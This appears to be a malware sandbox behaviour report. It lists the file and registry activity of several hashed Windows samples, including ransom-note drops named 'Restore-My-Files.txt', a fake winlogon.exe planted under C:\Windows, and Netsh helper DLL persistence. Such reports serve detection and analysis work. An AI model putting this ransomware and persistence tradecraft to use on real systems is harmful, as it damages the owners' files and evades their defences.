File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_F_COL.HXK C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\flavormap.properties C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\it-IT\mshwLatin.dll.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\sv-SE\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrcommonlm.dat C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-pl.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\STSLIST.CHM C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\7-Zip\License.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\da-DK\Restore-My-Files.txt C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\adcvbs.inc C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLEX.DAT C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Drops file in Windows directory

Note: most rows here are msedge.exe unpacking component updates under C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping*, which is normal Edge behaviour and not sample activity. The rows that matter are the creation and modification of C:\Windows\winlogon.exe by the e28b... sample (the legitimate winlogon.exe lives only in C:\Windows\System32, so a copy directly under C:\Windows is a masquerading drop) and the d4c6... sample writing Desktop.ini into C:\Windows\assembly.

Description Indicator Process Target
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\autofill_bypass_cache_forms.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\typosquatting_list.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_etld1_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_full_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\data.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\typosquatting_list.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\well_known_domains.dll C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\protocols.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\v1FieldTypes.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\ct_config.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\edge_autofill_global_block_list.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\kp_pinslist.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\winlogon.exe C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\safety_tips.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\keys.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\crs.pb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1682189713\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\winlogon.exe C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File opened for modification C:\Windows\assembly C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\regex_patterns.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmp1.jpg N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winlogon.exe N/A
